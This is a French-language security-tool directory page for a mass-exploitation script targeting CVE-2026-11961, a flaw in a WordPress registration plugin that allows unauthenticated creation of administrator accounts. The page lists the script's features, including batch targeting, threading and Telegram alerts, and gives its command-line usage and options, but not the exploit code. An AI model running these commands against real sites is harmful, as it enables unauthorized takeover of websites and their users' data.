Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-11961 — CVE-2026-11961 — UserRegistration : WordPress User Registration <= 5.2.2 Élévation de privilèges. Rôles d'adhésion mal configurés → Création d'administrateur non authentifiée → Compromission du site. CVSS 8.1 | Kitploit
Outils/GitHubGitHub/johenlastgen-jlg/cve-2026-11961
Escalade de PrivilègesScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionMauvaise Configuration

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
johenlastgen-jlg/cve-2026-11961

CVE-2026-11961

CVE-2026-11961 — UserRegistration : WordPress User Registration <= 5.2.2 Élévation de privilèges. Rôles d'adhésion mal configurés → Création d'administrateur non authentifiée → Compromission du site. CVSS 8.1

Voir le dépôt
16il y a 1 moisPas encore vérifié

CVE-2026-11961

Outil d'exploitation massive pour CVE-2026-11961 affectant le plugin WordPress User Registration & Membership.

Fonctionnalités

  • Détection de la version du plugin
  • Support de cible unique
  • Traitement par lot des cibles
  • Support multi-threads
  • Identifiants aléatoires ou personnalisés
  • Support du proxy HTTP/HTTPS
  • Configuration du délai d'expiration des requêtes
  • Sortie JSONL
  • Support des fichiers journaux
  • Notifications Telegram
  • Mode force (--force)

Utilisation

root@kitploit:~
# Afficher l'aide
python3 mass.py -h

# Cible unique
python3 mass.py -u https://target.com

# Cible unique avec identifiants personnalisés
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"

# Cibles multiples
python3 mass.py -l targets.txt -t 20

# Enregistrer les résultats réussis
python3 mass.py -l targets.txt -o results.jsonl

# Écrire un fichier journal
python3 mass.py -l targets.txt --log exploit.log

# Notifications Telegram
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID

# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080

# Mode force
python3 mass.py -u https://target.com --force

Options

Avertissement

Ce projet est fourni uniquement pour des évaluations de sécurité autorisées, la recherche en sécurité défensive et la validation de vulnérabilités.

En utilisant ce logiciel, vous confirmez que vous disposez d'une autorisation explicite pour évaluer les systèmes cibles. L'accès non autorisé à des systèmes informatiques est interdit et peut enfreindre les lois applicables.

L'auteur et les contributeurs n'encouragent ni n'approuvent l'utilisation non autorisée de ce projet et déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques résultant de son utilisation.

Auteur

JohenLastGen JLG NETWORK

Télécharger l’outil
OptionDescription
-h, --helpAfficher le message d'aide et quitter
-u, --urlURL d'une cible unique
-l, --listFichier contenant les URL des cibles (une par ligne)
--usernameNom d'utilisateur administrateur (par défaut : généré aléatoirement)
--passwordMot de passe administrateur (par défaut : généré aléatoirement)
-t, --threadsNombre de threads simultanés (par défaut : 5)
--timeoutDélai d'expiration des requêtes en secondes (par défaut : 15)
-o, --outputEnregistrer les résultats réussis dans un fichier JSONL
--logEnregistrer les journaux de la console dans un fichier
--proxyProxy HTTP/HTTPS (ex. http://127.0.0.1:8080)
--forceIgnorer la validation de la version et continuer le traitement
--tg-tokenJeton du bot Telegram
--tg-chatIdentifiant du chat Telegram